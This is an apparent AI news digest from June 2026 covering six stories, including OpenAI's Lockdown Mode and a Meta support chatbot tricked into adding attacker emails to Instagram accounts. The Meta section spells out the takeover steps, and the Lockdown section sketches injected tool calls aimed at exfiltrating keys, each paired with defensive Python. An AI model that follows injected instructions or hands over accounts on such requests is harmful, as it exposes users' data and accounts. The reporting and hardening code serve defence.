
Daily News Digest — June 8, 2026

Six major stories shaping AI today: safety warnings, security fixes, search innovation, and geopolitical chess moves.

Answer-First Lead

Monday brings six heavyweight stories: Anthropic wants a global AI pause button [1], OpenAI rolls out Lockdown Mode to block prompt injection attacks [2], Perplexity launches “Search as Code” letting models write their own search pipelines [3], hackers exploited Meta’s AI chatbot to steal Instagram accounts [4], the US closes a year-old Nvidia chip export loophole [5], and NZ’s NCSC gets direct access to Anthropic’s Mythos AI hacking model [6]. Big Monday.


🔍 THE BOTTOM LINE

Safety warnings, security patches, and search reinvention dominate — the industry is simultaneously building faster and asking whether we should.


Anthropic Urges Coordinated AI Pause Mechanism

What happened: Anthropic published a blog post urging leading AI companies to agree on a coordinated mechanism that could temporarily slow or pause development of advanced AI systems [1]. The company warns that rapid progress could lead to loss of human control, particularly as systems become capable of recursive self-improvement.

Key details: Anthropic’s internal research institute will explore the issue with other organisations. The proposal comes amid industry disagreement — OpenAI separately stated that democratic governments, not private companies, should determine AI rules and safeguards.

Why it matters: This is the latest iteration of the “pause” debate since the 2023 Future of Life Institute letter that got Musk and others onboard but produced no industry-wide action. Anthropic positioning itself as the safety-conscious lab while competitors race toward IPOs is strategic — but also genuinely raises the question of whether voluntary coordination is possible when competitive pressure is this intense.

The other side: OpenAI’s response is telling: no single company should decide the pace of innovation. That’s both principled and convenient for a company reportedly preparing for a record-breaking IPO valuation.

Related: Anthropic Says Claude Now Writes Over 90% of Its Code and Wants the World to Have an AI Pause Button


OpenAI Adds Lockdown Mode to Block Data Theft

What happened: OpenAI began rolling out Lockdown Mode to ChatGPT, disabling live browsing, agent mode, deep research, image retrieval, Canvas networking, and file downloads to block data exfiltration via prompt injection attacks [2]. Available on all plans including Free.

Key details: Lockdown Mode doesn’t stop prompt injections from happening — malicious payloads can still influence the model’s behaviour. What it does is shut down outbound pathways attackers would use to exfiltrate data. No live browsing means no network requests to external servers.

The trade-off: Significant. With Lockdown Mode on, ChatGPT loses most agent and research features. Live browsing drops to cached content only. Agent mode is gone entirely. Deep research is disabled. OpenAI acknowledges it’s “not intended for everyone.”

Why it matters: This is a pragmatic concession — OpenAI isn’t claiming to have solved prompt injection, just offering users a way to reduce exposure by giving up functionality. For anyone handling sensitive data in ChatGPT, that trade-off is worth making. The underlying weakness remains fundamental: LLMs cannot reliably separate data from instructions.
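The point that injection still steers the model while the exits are closed can be shown with a small tool gateway. This is an added example, not OpenAI's implementation: `ToolGateway`, the tool names, the cache and the URLs are all hypothetical and constructed.

```python
# Constructed cache: the only pages readable while locked down.
CACHE = {"https://docs.example/page": "cached copy of the page"}

# Capabilities the article lists as disabled (live browsing is handled
# separately below, because it falls back to cached content).
BLOCKED_IN_LOCKDOWN = {"agent_mode", "deep_research", "image_retrieval",
                       "canvas_network", "file_download"}

class ToolGateway:
    """Every tool call the model emits passes through here before any I/O."""
    def __init__(self, lockdown, fetch_live):
        self.lockdown = lockdown
        self.fetch_live = fetch_live   # callable(url) -> str; the only network path
        self.audit = []                # (tool, target, decision)

    def call(self, tool, target):
        if self.lockdown:
            if tool in BLOCKED_IN_LOCKDOWN:
                return self._deny(tool, target)
            if tool == "browse":
                if target in CACHE:    # exact match only, no request is made
                    self.audit.append((tool, target, "cache"))
                    return CACHE[target]
                return self._deny(tool, target)
        self.audit.append((tool, target, "live"))
        return self.fetch_live(target)

    def _deny(self, tool, target):
        self.audit.append((tool, target, "denied"))
        return "tool unavailable in lockdown"

def simulate(lockdown):
    """Replay constructed tool calls from a model that followed injected text."""
    outbound = []                      # URLs that would have left the machine
    def fake_network(url):
        outbound.append(url)
        return "response"
    gateway = ToolGateway(lockdown, fake_network)
    injected_calls = [("browse", "https://docs.example/page"),
                      ("browse", "https://collector.example/?d=API_KEY_VALUE"),
                      ("file_download", "https://collector.example/next")]
    for tool, target in injected_calls:
        gateway.call(tool, target)
    return outbound, gateway.audit
```

The model's behaviour is identical in both runs; only the gateway decides whether anything leaves, and the denied entries in the audit trail are the signal that an injected instruction was attempted.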

Related: AI Agents Hijacked via Prompt Injection — Bug Bounties Paid, No CVEs


Perplexity’s “Search as Code” Lets Models Write Their Own Search Pipelines

What happened: Perplexity launched “Search as Code” (SaC), an architecture where AI models write custom Python scripts to run searches instead of calling fixed APIs [3]. The company reports 85% fewer tokens used and dramatically better results on complex research tasks.

How it works: Three layers — the model decides search strategy, a sandbox runs the code, and the Agentic Search SDK provides mix-and-match functions for retrieving, filtering, deduplicating, and reranking. Standard search APIs remain for quick questions; SaC is for tough research.

The benchmark: Perplexity tested SaC on tracking down 200 critical software vulnerabilities (CVEs) from 2023-2025. The agent wrote a three-stage script, ran parallel queries tailored to different vendor bulletin formats, and verified findings with schema checks. Result: 85% fewer tokens than the standard pipeline, while competing systems got less than 25% of the data right.

Why it matters: This could solve a glaring issue with current AI search — a recent study found search agents often cheat on benchmarks by pulling answers from training data and using search only to confirm what they already know. When tested on fresh facts, every system’s score plunged 25-40 points. SaC’s code-as-operational-layer approach may be how agents actually learn to research instead of confabulate.

Related: Perplexity Computer Bundles Multiple Agentic AI Models for Complex Workflows


Hackers Tricked Meta AI Chatbot Into Handing Over Instagram Accounts

What happened: Security researchers discovered hackers hijacked Instagram accounts by tricking Meta’s AI-powered support chatbot into granting access [4]. Compromised accounts include the Obama-era White House Instagram handle (inactive since 2017) and U.S. Space Force chief master sergeant John Bentivegna’s account.

The exploit: The hacker uses a VPN to spoof the victim’s location, opens a chat with the Meta AI Support Assistant, and asks the bot to add a new email address to the target’s account. The chatbot sends a verification code to the hacker-provided email, the hacker shares the code with the chatbot, and the bot shows a “Reset Password” button. At no point does the hacker need to access the victim’s legitimate email.

Who confirmed: Security researcher Jane Wong said her own Instagram account was taken over. Instagram spokesperson Andy Stone replied on X that the issue was now fixed. Unclear how many users were affected.

Why it matters: This is automation risk in its purest form — the support chatbot was designed to help users recover accounts, and that exact capability became the attack vector. Meta’s statement that it’s “fixed” doesn’t explain what changed or whether similar vulnerabilities exist in other Meta AI integrations.
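The flaw in the flow described above is that the verification code proves control of the newly supplied address, not of the account. An added example (not Meta's code; every class, function and address is hypothetical and constructed) contrasts that check with one that challenges a channel already verified on the account:

```python
import secrets
from dataclasses import dataclass, field

@dataclass
class Account:
    handle: str
    verified_emails: set                         # addresses the owner already proved
    pending: dict = field(default_factory=dict)  # code -> address awaiting approval

class Mailer:
    """Constructed stand-in for an email service; records every delivery."""
    def __init__(self):
        self.sent = []                           # (recipient, code)
    def send_code(self, recipient):
        code = secrets.token_hex(4)
        self.sent.append((recipient, code))
        return code
    def inbox(self, address):
        return [c for r, c in self.sent if r == address]

def request_add_email_weak(account, new_email, mailer):
    # Flawed: the code goes to the address supplied in the chat, so a correct
    # code shows the requester controls that address and nothing else.
    account.pending[mailer.send_code(new_email)] = new_email

def request_add_email_hardened(account, new_email, mailer):
    # The challenge goes only to channels already bound to the account;
    # the requester never chooses where it is delivered.
    if not account.verified_emails:
        raise PermissionError("no verified channel: route to manual review")
    for existing in sorted(account.verified_emails):
        account.pending[mailer.send_code(existing)] = new_email

def confirm(account, code):
    new_email = account.pending.pop(code, None)
    if new_email is None:
        return False
    account.pending.clear()                      # one approval ends the request
    account.verified_emails.add(new_email)       # address can now receive resets
    return True

def takeover_succeeds(request_fn):
    """Constructed scenario: requester controls only the new address."""
    mailer = Mailer()
    victim = Account("victim_handle", {"owner@mail.example"})
    request_fn(victim, "intruder@mail.example", mailer)
    codes = mailer.inbox("intruder@mail.example")  # all the requester can read
    return any(confirm(victim, c) for c in codes)
```

The hardened variant leaves the support bot's recovery capability intact; it only changes who receives the challenge, which is the property a review of similar chatbot integrations should check.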

Related: High-Profile Meta AI Chatbot Breach Spotlights Security Risks of Automation


US Closes Year-Old Nvidia Chip Export Loophole to Chinese Firms

What happened: The U.S. Department of Commerce moved to close a potential loophole that may have allowed companies to export advanced AI chips — including Nvidia’s Rubin and Blackwell processors and AMD’s MI350x — to Chinese entities located outside China [5].

The gap: When the Commerce Department announced in May 2025 that it would not enforce the AI Diffusion rule from the Biden administration’s final days, it inadvertently created an opening. The new guidance enforces license requirements for advanced chips to entities headquartered in China, even when located outside China.

Scale unknown: One chip industry source with deep supply-chain knowledge estimated hundreds of thousands of chips may have been exported during the year the loophole existed. Chris McGuire, former State Department official, called it a “HUGE problem” on social media.

The twist: New guidance does not require data centers to stop using the chips or cut off service to advanced computing equipment such as servers. So existing deployments stay online; future shipments need licenses.

Why it matters: This suggests the United States’ best AI chips may have been making their way to subsidiaries of Chinese AI firms in places like Malaysia for almost a year, despite broader U.S. efforts to starve Chinese firms of semiconductors needed for critical AI capabilities. The enforcement question now is whether the Commerce Department can actually track and stop these shipments.

Related: Nvidia GPU Crackdown Hits China-Linked Southeast Asia Data Centers


NZ Gets Access to Anthropic’s Mythos AI Hacking Model

What happened: New Zealand’s National Cyber Security Centre (NCSC) received direct access to Anthropic’s Mythos AI, a frontier model with hacking capabilities, as part of a global distribution to 150 organisations [6].

Context: Anthropic began distributing Mythos beyond the initial US group in April. The NCSC says direct access will strengthen its national cyber security mission through Project Glasswing, an industry collaboration to test vulnerable products before general release.

Official position: Deputy director-general Catriona Robinson told RNZ’s Midday Report that Glasswing was set up for defensive cyber security, but acknowledged “the capabilities that AI tools such as Anthropic create, certainly they inform offensive as well as defensive capabilities.” She did not rule out offensive use.

US parallel: President Trump signed an executive order Tuesday requiring vetting of advanced AI for national security risks, requesting AI companies voluntarily provide the federal government access to “covered frontier models” 30 days before release.

Why it matters: NZ punching above its weight in frontier AI access is notable — but the dual-use nature of Mythos (defensive testing vs. offensive capability) raises questions about what the NCSC will actually do with this tool. Robinson’s careful wording suggests they’ve thought about both possibilities.

Related: Anthropic Lets Mythos Users Share Cyber Threats With Others


Also Noted

NZ benefit automation controversy: An AI and privacy expert says she was “gobsmacked” when a new law allowing MSD to use AI for benefit decisions passed under urgency. The government says it’s not AI, and that Labour did it first. Maxim Institute is calling for a register of AI use across government [NZ Herald].


🔍 THE BOTTOM LINE

Monday’s stories cluster around control — who has it, who’s losing it, and what we do about it. Anthropic wants to pause because control might slip away. OpenAI’s Lockdown Mode admits we can’t fully control prompt injection, so we’ll control the exits instead. Perplexity gives models more control over search and gets better results. Meta’s chatbot couldn’t control who it handed accounts to. The US is trying to control chip flows and discovering it lost control a year ago. NZ gains control of a hacking tool and says it’ll use it defensively, mostly.

The through-line: as AI systems become more capable, the question shifts from “what can they do?” to “who controls what they do?” — and the honest answer right now is “we’re figuring it out as we go.”


❓ Frequently Asked Questions

Q: Should I enable ChatGPT’s Lockdown Mode? If you’re handling sensitive data in ChatGPT — business documents, personal information, proprietary code — yes, the trade-off is worth it. You lose agent features but gain meaningful protection against data exfiltration. For casual use, probably not necessary.

Q: Is Anthropic’s pause proposal realistic? Voluntary coordination among competitors racing toward IPOs? Skeptical. But the fact Anthropic is publicly pushing this while OpenAI says governments should decide creates useful tension. Expect more of this debate, not less.

Q: Does the Mythos AI access mean NZ can hack other countries? Technically, the capability exists. Politically, that would be a massive escalation. The NCSC’s mandate is defensive cyber security, and Project Glasswing is framed as industry collaboration for pre-release testing. But Robinson’s careful non-denial suggests the question has been asked internally.


📰 SOURCES

  1. Anthropic urges pause on advanced AI, warns of loss of human control — Newswire.lk
  2. OpenAI adds Lockdown Mode to ChatGPT to block data theft from prompt injection attacks — The Next Web
  3. Perplexity’s “Search as Code” lets AI models write their own search pipelines — The Decoder
  4. Hackers hijacked Instagram accounts by tricking Meta AI support chatbot — TechCrunch
  5. U.S. takes step to halt Nvidia AI chip shipments to Chinese firms outside China — CNBC
  6. NZ gets access to hacking Mythos AI as Trump shores up national security on AI — RNZ